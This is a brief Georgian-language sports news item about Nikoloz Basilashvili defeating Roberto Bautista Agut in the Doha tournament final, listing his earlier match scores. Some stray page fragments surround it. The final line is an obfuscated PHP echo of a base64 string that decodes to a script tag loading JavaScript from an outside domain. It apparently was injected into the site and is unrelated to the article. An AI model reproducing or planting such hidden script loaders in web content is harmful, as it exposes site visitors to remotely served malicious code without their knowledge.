celsiusi
ავერსი შნაიდერი
დოჰას საერთაშორისო ტურნირის ფინალში ნიკოლოზ ბასილაშვილმა (42) ესპანელი რობერტო ბაუტისტა აგუტი (13) ორ სეტში დაამარცხა.
 
აღსანიშნავია, რომ დოჰას საერთაშორისო ტურნირის საპრიზო ფონდი 1 153 560 შეადგენს. 
 
პირველი სეტი ნოკოლოზმა მეტოქეს ტაიბრიეკზე მოუგო, მეორე კი - 6:2. აღსანიშნავია, რომ მან წაგებათა 5-მატჩიანი სერიის შემდეგ ზედიზედ ხუთჯერ იმარჯვა.
 
შეგახსენებთ, ბასილაშვილი აგუტს მეხუთედ შეხვდა და მეორე და ყველაზე მნიშვნელოვანი გამარჯვება მოიპოვა.
 
აქამდე ტურნირზე ნიკოლოზმა ავსტრალიელ ჯონ მილმანს (6:4, 6:2), ტუნისელ მალექ ჯაზირს (6:2, 6:2,) შვეიცარიელ როჯერ ფედერერს (3:6, 6:1, 7:5) და ამერიკელ ტეილორ ფრიტცს (7:6, 6:1)) სძლია.
 
 
1649
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");